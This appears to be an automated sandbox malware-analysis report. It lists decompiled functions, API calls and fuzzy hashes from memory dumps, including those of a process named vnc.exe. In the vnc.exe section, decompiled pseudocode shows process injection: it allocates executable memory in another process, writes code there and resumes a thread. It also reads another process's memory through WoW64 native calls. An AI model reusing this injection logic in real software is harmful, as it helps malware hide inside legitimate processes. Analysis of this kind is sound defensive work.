Instruction Fuzzy Hash: 28118B72901618BFEF028F91DC55EEA7F69EF083A4F480126FA0562020C731DC64ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E3B2C5, Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 00E3B2E4
ScreenToClient.USER32 ref: 00E3B2FC
ScreenToClient.USER32 ref: 00E3B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 00E3B33B

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 1d47292fef46f66a49fe161ea3e8ed6a34caa89acc15607f9ee0165b9c20b0f3
Instruction ID: 0dcbabd09f2f9162c97639778fb218f0ef9d62335c3bf0308d6971a417e182f1
Opcode Fuzzy Hash: 1d47292fef46f66a49fe161ea3e8ed6a34caa89acc15607f9ee0165b9c20b0f3
Instruction Fuzzy Hash: C41132B9D0060DAFDB41CFA9C8859EEBFB9FB08210F108166E915E2220D775AA558F91

Uniqueness

Uniqueness Score: -1.00%

Function 00E3BD1C, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00DB12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DB134D
Part of subcall function 00DB12F3: SelectObject.GDI32(?,00000000), ref: 00DB135C
Part of subcall function 00DB12F3: BeginPath.GDI32(?), ref: 00DB1373
Part of subcall function 00DB12F3: SelectObject.GDI32(?,00000000), ref: 00DB139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E3BD40
LineTo.GDI32(00000000,?,?), ref: 00E3BD4D
EndPath.GDI32(00000000), ref: 00E3BD5D
StrokePath.GDI32(00000000), ref: 00E3BD6B

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: d517eacb8bd03658a9d5706bbf1c21a6e2641f180b1eaccd84302b1f685bff8e
Instruction ID: dd3188fa3ce0dd1c6b7a272f0bb352f82b77b2ab383b55ec6b4106943fc2407d
Opcode Fuzzy Hash: d517eacb8bd03658a9d5706bbf1c21a6e2641f180b1eaccd84302b1f685bff8e
Instruction Fuzzy Hash: 9DF09A32401659BBDB126F56AC0EFCE3F98AF06310F444010FA12310E287B40668CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00DB2218, Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00DB2231
SetTextColor.GDI32(?,000000FF), ref: 00DB223B
SetBkMode.GDI32(?,00000001), ref: 00DB2250
GetStockObject.GDI32(00000005), ref: 00DB2258
GetWindowDC.USER32(?,00000000), ref: 00DEBE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 00DEBE90
GetPixel.GDI32(00000000,?,00000000), ref: 00DEBEA9
GetPixel.GDI32(00000000,00000000,?), ref: 00DEBEC2
GetPixel.GDI32(00000000,?,?), ref: 00DEBEE2
ReleaseDC.USER32 ref: 00DEBEED

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: c417bbbe860becfd8a27870396a40e401773d53376007a4d4ae811e6cfd7626f
Instruction ID: 2bd5ed2d73af338fc4d4df2e90868587fe93fefccab3c14396b2f6c9b13881ce
Opcode Fuzzy Hash: c417bbbe860becfd8a27870396a40e401773d53376007a4d4ae811e6cfd7626f
Instruction Fuzzy Hash: BEE03032504148FEDF215F65FC0D7D83F10EB05332F048366FA69580E187714984DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00DB6240, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%, xrefs: 00DB624E

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: %
API String ID: 0-2291192146
Opcode ID: 53484d44f5cc168a0bc603807b1a7d0cbafa30cc68043e47fdde60878434ca1b
Instruction ID: c382f7c67ae6856cc5ee0552994e37b6f1ea386dd1c4bed14990182c2b5f87cc
Opcode Fuzzy Hash: 53484d44f5cc168a0bc603807b1a7d0cbafa30cc68043e47fdde60878434ca1b
Instruction Fuzzy Hash: FEB17F71904109DBCF14EF98C885AFEB7B5EF44310F184126E947A7295DB38DA85CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00E19734, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00DB4F0B: __fread_nolock.LIBCMT ref: 00DB4F29

_wcscmp.LIBCMT ref: 00E19824
_wcscmp.LIBCMT ref: 00E19837

Strings

FILE, xrefs: 00E19770

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: fccbfb1d780ee278d524f0c50c6f02bc8038c8928150de46029d84e65d431fd8
Instruction ID: 43df82c80ea62c71210eaa1d57ff1c013b764ad20676c6dbd27769a791fec578
Opcode Fuzzy Hash: fccbfb1d780ee278d524f0c50c6f02bc8038c8928150de46029d84e65d431fd8
Instruction Fuzzy Hash: 1641B671A40209BADF24DEA0CC55FEFB7BDDF89714F00046AF905B7282DA71A9448B71

Uniqueness

Uniqueness Score: -1.00%

Function 00E18D91, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E18DAC
__fread_nolock.LIBCMT ref: 00E18DC1

Strings

EA06, xrefs: 00E18DF3

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 6f5488172b0f4d002fa699eccfef2b34856d5128dcf497491ee53e6c222c4de6
Instruction ID: 7819d1e385ff8f1f54e715ae9d221dd930eca8d7566608b048796b53ba39a0ea
Opcode Fuzzy Hash: 6f5488172b0f4d002fa699eccfef2b34856d5128dcf497491ee53e6c222c4de6
Instruction Fuzzy Hash: 4601B9719042187EDB18CAA8D856EEE7BFCDB15311F00459FF552D2281E975E6148B70

Uniqueness

Uniqueness Score: -1.00%

Function 00DEB2C1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00DEB314: _memset.LIBCMT ref: 00DEB321

Part of subcall function 00DD0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00DEB2F0,?,?,?,00DB100A), ref: 00DD0945

IsDebuggerPresent.KERNEL32(?,?,?,00DB100A), ref: 00DEB2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00DB100A), ref: 00DEB303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00DEB2FE

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: fe78c07016c6dfe6dc9002db027e829daa392a8169423ab683e3473d18a21af0
Instruction ID: 9612dc2c697d8e0e0f1d5487630f9d90c8660f7f454e26b3b7ceb1d9fb38d76c
Opcode Fuzzy Hash: fe78c07016c6dfe6dc9002db027e829daa392a8169423ab683e3473d18a21af0
Instruction Fuzzy Hash: 6CE039706007418ED721AF2AD50A3477AE8EF01714F04892EE886D6661EBB4E448CBB1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vnc.exe PID: 6296 Parent PID: 7128 vnc.exeCOMMON

Executed Functions

Function 00AB3509, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 193
librarynativeloaderCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00AB3509(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				short _v16;
				unsigned int _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				char _v92;
				char _v100;
				_Unknown_base(*)()* _t86;
				intOrPtr* _t87;
				void* _t91;
				void* _t92;
				intOrPtr _t97;
				intOrPtr _t99;
				char _t103;
				intOrPtr* _t104;
				intOrPtr _t106;
				intOrPtr _t116;
				unsigned int _t117;
				char* _t119;
				char* _t122;
				unsigned int _t123;
				intOrPtr* _t129;
				unsigned int _t131;
				intOrPtr _t132;
				intOrPtr _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t139;
				char* _t140;
				void* _t142;
				void* _t144;
				void* _t145;
				void* _t146;
				void* _t147;

				_t122 = 0;
				_v16 = 0;
				_t140 = 0;
				_t86 = GetProcAddress(GetModuleHandleW(L"NTDLL.DLL"), "ZwWow64QueryInformationProcess64");
				if(_t86 == 0) {
					L27:
					_t87 = _a16;
					if(_t87 != 0) {
						 *_t87 = _t140;
					}
					if(_t140 <= _a12) {
						_t122 =  !=  ? 1 : _t122;
					}
					return _t122;
				}
				_t91 =  *_t86(_a4, 0,  &_v100, 0x30,  &_v12); // executed
				if(_t91 < 0) {
					goto L27;
				}
				_t92 = E00AB1490(0x200);
				_v24 = _t92;
				if(_t92 == 0) {
					goto L27;
				}
				_t142 = E00AB1490(0x100);
				_v36 = _t142;
				if(_t142 == 0) {
					L24:
					LocalFree(_v24);
					if(_t142 != 0) {
						LocalFree(_t142);
					}
					goto L27;
				}
				_t97 = E00AB31D4( &_v100, _a4,  &_v92, _t142, 0x28); // executed
				_t146 = _t145 + 0x10;
				_v12 = _t97;
				if(_t97 == 0) {
					goto L24;
				}
				_t10 = _t142 + 0x28; // 0x28
				_t11 = _t142 + 0x18; // 0x18
				_t99 = E00AB31D4(_t11, _a4, _t11, _t10, 0x40); // executed
				_t147 = _t146 + 0x10;
				_v12 = _t99;
				if(_t99 == 0) {
					goto L24;
				}
				_t135 =  *((intOrPtr*)(_t142 + 0x3c));
				_v28 =  *((intOrPtr*)(_t142 + 0x18)) + 0x10;
				asm("adc eax, ebx");
				_v48 = _t135;
				_v32 =  *((intOrPtr*)(_t142 + 0x1c));
				_t128 = _a8 + 8;
				_t103 =  *((intOrPtr*)(_t142 + 0x38));
				_v52 = _t103;
				_t140 = 4;
				_v8 = _a8 + 8;
				if(_t103 != _v28 || _t135 != _v32) {
					_t26 = _t142 + 0x68; // 0x68
					_t104 = _t26;
					while(1) {
						_t106 = E00AB31D4(_t128, _a4,  &_v52, _t104, 0x98); // executed
						_t147 = _t147 + 0x10;
						_v12 = _t106;
						if(_t106 == 0) {
							goto L22;
						}
						_t30 = _t142 + 0x68; // 0x68
						_t104 = _t30;
						_t140 = _t140 + 0x120;
						_t128 =  *_t104;
						_t136 =  *((intOrPtr*)(_t104 + 4));
						_v40 = _t128;
						_v52 = _t128;
						_v44 = _t136;
						_v48 = _t136;
						if(_t140 > _a12) {
							L20:
							if(_t128 != _v28 || _t136 != _v32) {
								continue;
							} else {
								goto L22;
							}
						}
						_t137 = _v8;
						_t131 = ( *(_t142 + 0xb0) & 0x0000ffff) >> 1;
						 *((short*)(_t137 + 0x18)) = _v16;
						 *((intOrPtr*)(_t137 + 0x14)) =  *((intOrPtr*)(_t142 + 0xd0));
						 *((short*)(_t137 + 0x1c)) =  *((intOrPtr*)(_t142 + 0xd4));
						 *((intOrPtr*)(_t137 + 0x10)) =  *((intOrPtr*)(_t142 + 0xa8));
						 *((intOrPtr*)(_t137 + 8)) =  *((intOrPtr*)(_t142 + 0x98));
						_v20 = _t131;
						 *((intOrPtr*)(_t137 + 0xc)) =  *((intOrPtr*)(_t142 + 0x9c));
						if(_t131 >= 0x100) {
							L19:
							_t128 = _v40;
							_t73 = _t142 + 0x68; // 0x68
							_t104 = _t73;
							_v16 = _v16 + 1;
							_v8 = _t137 + 0x120;
							_t136 = _v44;
							goto L20;
						}
						_t54 = _t142 + 0xb8; // 0xb8
						_t116 = E00AB31D4(_t131, _a4, _t54, _v24,  *(_t142 + 0xb0) & 0x0000ffff); // executed
						_t147 = _t147 + 0x10;
						_v12 = _t116;
						if(_t116 == 0) {
							_t137 = _v8;
							goto L19;
						}
						_t117 = _v20;
						_t139 = _t122;
						_t132 = _v8;
						if(_t117 == 0) {
							L17:
							(_t132 + 0x20)[_t117] = _t122;
							_t68 = _t132 + 0x20; // 0x20
							_t119 = StrRChrA(_t68, _t122, 0x5c); // executed
							_t137 = _v8;
							 *((short*)(_t137 + 0x1e)) =  &(_t119[0xffe1 - _t137]);
							goto L19;
						}
						_t144 = _v24;
						_t123 = _t117;
						do {
							(_t132 + 0x20)[_t139] =  *((intOrPtr*)(_t144 + _t139 * 2));
							_t139 = _t139 + 1;
						} while (_t139 < _t123);
						_t142 = _v36;
						_t122 = 0;
						_t117 = _v20;
						goto L17;
					}
					goto L22;
				} else {
					L22:
					_t129 = _a8;
					if(_t129 != 0) {
						 *_t129 = _v16;
					}
					goto L24;
				}
			}

0x00ab3511
0x00ab3518
0x00ab351b
0x00ab3529
0x00ab3531
0x00ab3738
0x00ab3738
0x00ab373d
0x00ab373f
0x00ab373f
0x00ab3744
0x00ab374b
0x00ab374b
0x00ab3755
0x00ab3755
0x00ab3545
0x00ab3549
0x00000000
0x00000000
0x00ab3554
0x00ab3559
0x00ab355e
0x00000000
0x00000000
0x00ab356f
0x00ab3571
0x00ab3576
0x00ab3725
0x00ab3728
0x00ab372f
0x00ab3732
0x00ab3732
0x00000000
0x00ab3737
0x00ab3586
0x00ab358b
0x00ab358e
0x00ab3593
0x00000000
0x00000000
0x00ab359b
0x00ab359f
0x00ab35a6
0x00ab35ab
0x00ab35ae
0x00ab35b3
0x00000000
0x00000000
0x00ab35c2
0x00ab35c5
0x00ab35cb
0x00ab35cd
0x00ab35d0
0x00ab35d3
0x00ab35d6
0x00ab35db
0x00ab35de
0x00ab35df
0x00ab35e5
0x00ab35f0
0x00ab35f0
0x00ab35f3
0x00ab3600
0x00ab3605
0x00ab3608
0x00ab360d
0x00000000
0x00000000
0x00ab3613
0x00ab3613
0x00ab3616
0x00ab361c
0x00ab361e
0x00ab3621
0x00ab3624
0x00ab3627
0x00ab362a
0x00ab3630
0x00ab3707
0x00ab370a
0x00000000
0x00000000
0x00000000
0x00000000
0x00ab370a
0x00ab3636
0x00ab3643
0x00ab3645
0x00ab364f
0x00ab3659
0x00ab3663
0x00ab366c
0x00ab3675
0x00ab3678
0x00ab3681
0x00ab36f2
0x00ab36f2
0x00ab36f5
0x00ab36f5
0x00ab36fe
0x00ab3701
0x00ab3704
0x00000000
0x00ab3704
0x00ab368e
0x00ab3698
0x00ab369d
0x00ab36a0
0x00ab36a5
0x00ab36ef
0x00000000
0x00ab36ef
0x00ab36a7
0x00ab36aa
0x00ab36ac
0x00ab36b1
0x00ab36cc
0x00ab36ce
0x00ab36d2
0x00ab36d7
0x00ab36dd
0x00ab36e9
0x00000000
0x00ab36e9
0x00ab36b3
0x00ab36b6
0x00ab36b8
0x00ab36bb
0x00ab36bf
0x00ab36c0
0x00ab36c4
0x00ab36c7
0x00ab36c9
0x00000000
0x00ab36c9
0x00000000
0x00ab3719
0x00ab3719
0x00ab3719
0x00ab371e
0x00ab3723
0x00ab3723
0x00000000
0x00ab371e

APIs

GetModuleHandleW.KERNEL32(NTDLL.DLL,00000000,00000002,00000000,NTDLL.DLL,?,?,?,00AB2A77,?,?,?,?,00AB5468,00000028,00AB328D), ref: 00AB351D
GetProcAddress.KERNEL32(00000000,ZwWow64QueryInformationProcess64), ref: 00AB3529
NtWow64QueryInformationProcess64.NTDLL(00000008,00000000,00000030,00000030,00000008,?,?,?,00AB2A77,?,?,?,?,00AB5468,00000028,00AB328D), ref: 00AB3545

Part of subcall function 00AB1490: LocalAlloc.KERNEL32(00000000,?,00AB29EC,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB1496

StrRChrA.KERNELBASE(00000020,00000000,0000005C), ref: 00AB36D7
LocalFree.KERNEL32(?,00000100,00000000,00000200,?,?,?,00AB2A77,?,?,?,?,00AB5468,00000028,00AB328D,00000000), ref: 00AB3728
LocalFree.KERNEL32(00000000,?,00000100,00000000,00000200,?,?,?,00AB2A77,?,?,?,?,00AB5468,00000028,00AB328D), ref: 00AB3732

Part of subcall function 00AB31D4: GetModuleHandleW.KERNEL32(NTDLL.DLL,ZwWow64ReadVirtualMemory64,00000000,?,?,?,00AB358B,00000008,?,00000000,00000028,00000100,00000000,00000200), ref: 00AB31F8
Part of subcall function 00AB31D4: GetProcAddress.KERNEL32(00000000), ref: 00AB31FF
Part of subcall function 00AB31D4: NtWow64ReadVirtualMemory64.NTDLL(00000028,00000000,?,?,00000008,00000000,00000028,00000000,?,?,?,00AB358B,00000008,?,00000000,00000028), ref: 00AB3227

Strings

ZwWow64QueryInformationProcess64, xrefs: 00AB3523
NTDLL.DLL, xrefs: 00AB3513

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Local$AddressFreeHandleModuleProcWow64$AllocInformationMemory64Process64QueryReadVirtual
String ID: NTDLL.DLL$ZwWow64QueryInformationProcess64
API String ID: 3048855126-3633144524
Opcode ID: 14937207c767dc1e052bdd796c0af215a2b5293c47caea790e81be2ed1822498
Instruction ID: 19651c1a7b18cea93f892297ba62cdb16f779ac78f1d06829bfbd4a2649ec7dc
Opcode Fuzzy Hash: 14937207c767dc1e052bdd796c0af215a2b5293c47caea790e81be2ed1822498
Instruction Fuzzy Hash: 127121B1E00605AFDF14DFA9C881AEEB7F9FF48340F144569E945A7252EB30EA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AB3383, Relevance: 12.1, APIs: 8, Instructions: 131
threadinjectionsleepCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00AB3383(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				void* _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				void* _v1024;
				void _v1028;
				intOrPtr _v1152;
				void* _v1156;
				intOrPtr _v1228;
				void _v1276;
				intOrPtr* _t44;
				void* _t47;
				void* _t50;
				intOrPtr* _t53;
				int _t59;
				void* _t60;
				intOrPtr _t63;
				void* _t69;
				intOrPtr _t72;
				intOrPtr _t74;
				void* _t75;
				void* _t77;
				void** _t79;
				long _t81;
				void* _t87;

				_t74 = __edx;
				_t69 = _t87;
				_v8 =  *((intOrPtr*)(_t69 + 4));
				_t81 = 0;
				memset( &_v1276, 0, 0x4d0);
				_t44 = E00AB3255(_t74);
				_t77 =  *(_t69 + 0xc);
				_v20 = _t44;
				_v1228 = 0x100003;
				memcpy(_t77 + 0x218, E00AB37D1, 0x100);
				_t47 = VirtualAllocEx( *( *(_t69 + 8)), 0, 0x318, 0x3000, 0x40); // executed
				_v16 = _t47;
				if(_t47 == 0) {
					L10:
					_t81 = GetLastError();
					L11:
					return _t81;
				}
				_t50 =  &_v1276;
				asm("cdq");
				_t72 = _t74;
				_v28 = _t50;
				_push(_t72);
				_push(_t50);
				_v24 = _t72;
				asm("cdq");
				_push(_t74);
				_push(( *(_t69 + 8))[1]);
				_t53 = _v20;
				_push(0);
				_push(2);
				_push( *((intOrPtr*)(_t53 + 4)));
				_push( *_t53);
				if(E00AB3760() >= 0) {
					asm("cdq");
					if( *((intOrPtr*)(_t77 + 0x10)) != _t77 + 0x18) {
						_t75 = _v16;
					} else {
						_t75 = _v16;
						if( *((intOrPtr*)(_t77 + 0x14)) == _t74) {
							 *((intOrPtr*)(_t77 + 0x10)) = _t75 + 0x18;
							asm("adc ecx, esi");
							 *((intOrPtr*)(_t77 + 0x14)) = 0;
						}
					}
					 *_t77 = _v1028;
					 *((intOrPtr*)(_t77 + 4)) = _v1024;
					_t79 =  *(_t69 + 8);
					_t59 = WriteProcessMemory( *_t79, _t75, _t77, 0x318,  &_v32); // executed
					if(_t59 == 0) {
						goto L10;
					} else {
						_t60 = _v16;
						_push(_v24);
						_v1156 = _t60;
						_push(_v28);
						asm("cdq");
						_v1028 = _t60 + 0x218;
						_v1024 = _t75;
						asm("cdq");
						_push(_t75);
						_push(_t79[1]);
						_t63 = _v20;
						_push(_t81);
						_v1152 = _t81;
						_push(2);
						_push( *((intOrPtr*)(_t63 + 0xc)));
						_push( *((intOrPtr*)(_t63 + 8)));
						if(E00AB3760() < 0) {
							goto L2;
						}
						ResumeThread(_t79[1]); // executed
						Sleep(0x1f4); // executed
						SuspendThread(_t79[1]); // executed
						goto L11;
					}
				}
				L2:
				_t81 = 5;
				goto L11;
			}

0x00ab3383
0x00ab3384
0x00ab3392
0x00ab33a5
0x00ab33af
0x00ab33b4
0x00ab33b9
0x00ab33c6
0x00ab33cf
0x00ab33da
0x00ab33f4
0x00ab33fa
0x00ab33ff
0x00ab34f6
0x00ab34fc
0x00ab34fe
0x00ab3508
0x00ab3508
0x00ab3405
0x00ab340b
0x00ab340c
0x00ab340e
0x00ab3411
0x00ab3412
0x00ab3416
0x00ab341c
0x00ab341d
0x00ab341e
0x00ab341f
0x00ab3422
0x00ab3423
0x00ab3425
0x00ab3428
0x00ab3434
0x00ab3441
0x00ab3445
0x00ab3460
0x00ab3447
0x00ab344a
0x00ab344d
0x00ab3456
0x00ab3459
0x00ab345b
0x00ab345b
0x00ab344d
0x00ab3469
0x00ab3471
0x00ab347e
0x00ab3484
0x00ab348c
0x00000000
0x00ab348e
0x00ab348e
0x00ab3491
0x00ab3494
0x00ab349f
0x00ab34a2
0x00ab34a3
0x00ab34ac
0x00ab34b2
0x00ab34b3
0x00ab34b4
0x00ab34b5
0x00ab34b8
0x00ab34b9
0x00ab34bf
0x00ab34c1
0x00ab34c4
0x00ab34d1
0x00000000
0x00000000
0x00ab34da
0x00ab34e5
0x00ab34ee
0x00000000
0x00ab34ee
0x00ab348c
0x00ab3436
0x00ab3438
0x00000000

APIs

memset.NTDLL ref: 00AB33AF

Part of subcall function 00AB3255: GetCurrentProcessId.KERNEL32(00000008,?,00000000,00AB33B9,?,00000000,000004D0,00000008,00000000), ref: 00AB3267
Part of subcall function 00AB3255: OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00AB33B9,?,00000000,000004D0,00000008,00000000), ref: 00AB3274
Part of subcall function 00AB3255: FindCloseChangeNotification.KERNELBASE(00000000,000004D0,00000008,00000000), ref: 00AB32C3

memcpy.NTDLL(?,00AB37D1,00000100,?,00000000,000004D0,00000008,00000000), ref: 00AB33DA
VirtualAllocEx.KERNELBASE(?,00000000,00000318,00003000,00000040,?,?,?,?,00000008,00000000), ref: 00AB33F4
WriteProcessMemory.KERNELBASE(?,?,?,00000318,?), ref: 00AB3484
ResumeThread.KERNELBASE(?), ref: 00AB34DA
Sleep.KERNELBASE(000001F4), ref: 00AB34E5
SuspendThread.KERNELBASE(?), ref: 00AB34EE
GetLastError.KERNEL32(?,?,?,?,00000008,00000000), ref: 00AB34F6

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$Thread$AllocChangeCloseCurrentErrorFindLastMemoryNotificationOpenResumeSleepSuspendVirtualWritememcpymemset
String ID:
API String ID: 1767431710-0
Opcode ID: b04e71875e34ee69945bffd4408bd931693011cb4202cd5cb5e4ce21b3f210fc
Instruction ID: c6f678735315626b65efa1793d7418eb5380e96b446e65dd973fda83e6361bd9
Opcode Fuzzy Hash: b04e71875e34ee69945bffd4408bd931693011cb4202cd5cb5e4ce21b3f210fc
Instruction Fuzzy Hash: EE4181B1940216AFDB11DF69CD45ADABBB8FF08711F0441A5F90897262D770AA50CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AB31D4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37
librarynativeloaderCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E00AB31D4(void* __ecx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				void _v12;
				intOrPtr* _t9;
				_Unknown_base(*)()* _t15;
				void* _t17;

				_t15 =  *0xb16d7c;
				asm("xorps xmm0, xmm0");
				_t17 = 0;
				asm("movlpd [ebp-0x8], xmm0");
				if(_t15 != 0) {
					L2:
					_t9 = _a8;
					 *_t15(_a4,  *_t9,  *((intOrPtr*)(_t9 + 4)), _a12, _a16, _t17,  &_v12); // executed
					_t17 =  >=  ? _v12 : _t17;
				} else {
					_t15 = GetProcAddress(GetModuleHandleW(L"NTDLL.DLL"), "ZwWow64ReadVirtualMemory64");
					 *0xb16d7c = _t15;
					if(_t15 != 0) {
						goto L2;
					}
				}
				return _t17;
			}

0x00ab31d9
0x00ab31df
0x00ab31e3
0x00ab31e5
0x00ab31ec
0x00ab3211
0x00ab3215
0x00ab3227
0x00ab322b
0x00ab31ee
0x00ab3205
0x00ab3207
0x00ab320f
0x00000000
0x00000000
0x00ab320f
0x00ab3235

APIs

